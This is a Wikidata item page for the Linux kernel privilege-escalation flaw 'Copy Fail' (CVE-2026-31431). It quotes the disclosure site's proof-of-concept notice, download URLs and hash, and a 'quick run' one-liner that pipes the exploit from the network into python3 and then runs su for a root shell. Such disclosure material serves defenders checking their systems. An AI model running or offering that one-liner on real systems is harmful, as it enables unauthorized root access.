Copy Fail (Q139596346)
Tools
Actions
General
Print/export
In other projects
Appearance
Text
Width
Color (beta)
From Wikidata
Linux kernel vulnerability discovered in 2026
- CVE-2026-31431
In more languages
Configure| Language | Label | Description | Also known as |
|---|---|---|---|
| default for all languages | No label defined |
–
|
|
| English | Copy Fail |
Linux kernel vulnerability discovered in 2026 |
|
| Japanese | No label defined |
No description defined |
|
| Okinawan | No label defined |
No description defined |
|
| Korean | No label defined |
No description defined |
Statements
a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
https://copy.fail/#exploit -> The PoC [proof of concept] is published so defenders can verify their own systems and validate vendor patches. \\ Use responsibly. Run only on systems you own or have written authorization to test. The script edits the page cache of a setuid binary; the change is not persistent across reboot, but the resulting root shell is real. Don't run it on production. \ copy_fail_exp.py 732 B [...] sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9 Download (GitHub): https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/refs/heads/main/copy_fail_exp.py \ Quick run: \ curl https://copy.fail/exp | python3 && su [...] $ curl -s https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/refs/heads/main/copy_fail_exp.py | sha256sum \ a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9 - \ $ curl -s https://arweave.developerdao.com/raw/LgCrUpLIrj6aGWTGah4uJwjGt0H9Zny9QETbFjJ-TjY | sha256sum \ a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9 - \ $ (English)